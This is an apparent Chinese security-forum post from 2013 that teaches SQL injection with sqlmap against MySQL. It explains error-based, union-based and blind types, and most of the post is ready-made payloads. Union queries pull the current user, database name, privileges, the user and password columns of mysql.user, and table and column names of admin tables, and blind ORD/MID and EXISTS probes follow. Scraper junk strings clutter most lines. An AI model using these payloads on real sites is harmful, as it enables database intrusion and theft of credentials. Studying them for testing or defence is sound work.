找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2102|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。  d2 O- l# X2 I4 I
* ]1 Q2 Q0 _0 }
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表2 i7 D/ l4 i' f' k* ]
3 D4 x& F0 r, Q8 J- _4 `( ?
分类标准        分类        备注
/ t* Q7 z/ d8 X按字段类型        整型注入,字符型注入       
6 w* I6 o- ]5 w! t+ E按出现的位置        get注入,post注入,cookie注入,http header注入       
8 q+ f# }8 x* T9 V! H! }然而高级注入是这样的% i, l2 t4 I  C' q  U' P

3 A7 H/ C9 f. b/ u/ J高级注入分类        条件+ s. G$ K3 W+ b- J* U! e
error-based sql        数据库的错误回显可以返回,存在数据库,表结构! Q8 h9 U5 ~2 X' }
union-based sql        能够使用union,存在数据库,表结构
  J9 {4 k5 W- |, j+ T2 Ublind sql        存在注入% o- R9 j& z7 [/ a1 R' ^* T
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。+ Q+ ]1 k& k) S5 N
* v' T2 l1 d( _
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火+ a& j$ ^2 u# z5 v

/ ~  f, G) X, e+ b: s# `附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
0 T+ v  i- k/ K) b% K0 [( ]
9 u5 I' z- R) X这里用mysql说明
  q& s. j" Q- x& e4 Q% p  n0 T
- V; {6 D8 H7 R4 a- ]( ^' Oe注入坛子里很多了,请看戳我或者再戳我# t" _* C6 g) z% q
. R1 i% S# O! @) _
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
2 \2 E5 V+ y% S. p4 y& S
) ]8 u8 k% w4 A! i0 R  T* X获取当前数据库用户名$ f$ s  N- B% p, j% v% E0 l
/ a# x5 N7 [. G
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
/ `4 J8 U) Q  P* U! v0 fAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
' X% V: A' g1 `- [. CL, NULL#! z6 {6 P$ S7 i8 f, m; j; X
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。9 L8 \) K8 ]1 F8 s/ c, d
2 Q3 g9 ]. ^6 j: z: q" ?9 c3 M
获取数据库名3 E4 n& A$ j* Y, w3 Q
/ E$ u6 g  P7 o: V
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#6 i: Q7 c0 D7 `1 Z$ g( q" G
获取所有用户名
, y; s6 ]2 l; R8 H : t0 \! E7 z" e" V  @! K
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
9 w1 K; y+ K) U5 ?查看当前用户权限
2 y6 r0 u8 z! j
2 I! G, v2 f5 B0 x6 \UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#" V8 A6 c# i! \/ k- v  h/ k" d9 Q
尝试获取密码,当然需要有能读mysql数据库的权限3 k1 U7 g; I" |0 \. g

* W( H: b- ]4 `" \1 N: n0 KUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
) E- T( R4 L6 s- B" i获取表名,limit什么的自己搞啦  s! x/ A6 K; k+ r

$ a' i. g3 }, R' v0 c* Z" _! u& YUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#4 w# L8 b7 |8 m7 m+ w* R
获取字段名及其类型  X( j; R7 F' ~' i9 X
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
" _- V& l+ d+ Z  d+ G ) M7 X! {/ f. P( H  C" n
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
' D: Y# s' Z5 X4 \" x 8 g- ~4 b+ ~1 ?7 }1 i
如:
7 s7 V3 l# F  k获取当前用户名3 a6 W7 s5 ?2 v) m/ t
5 _* d  s5 R: Z# r  ?2 V! H( i
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
6 {1 t, r' m9 h! W获取当前数据库5 H; R( y2 }0 R* H
4 i! N' ?" x0 f- c3 y7 t& C
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
1 D) t& u7 {8 h6 f, d9 D% ]获取表名7 _7 P1 D2 T& F8 d1 K" b* j) D

' L- |; X* R, ?0 E0 H% ]% RAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51$ d$ W6 J2 Y' _# l) c; _
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
* x7 g3 V2 `1 e& ?回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。- \. \. g0 Z$ z) q
爆表; ^2 q% p( s8 J1 w. A

( e9 J% w3 L) G8 d& X9 ZAND EXISTS(select * from table)7 B7 o' n% k4 o& H
爆字段
* M+ I  m; w" M" ]! b: e( k9 W( _
! l- Y! U$ H3 ]3 C& sAND EXISTS(select pwd from table)
4 L) f) _/ P/ Z/ H盲注的变化就比较多了,由于篇幅,只是举个例子而已。
: X  r1 R2 Q% C9 H, l/ h* X
. D! |( r+ B5 ?! n% d. \本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
: x( b3 V: D! p; U# |8 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表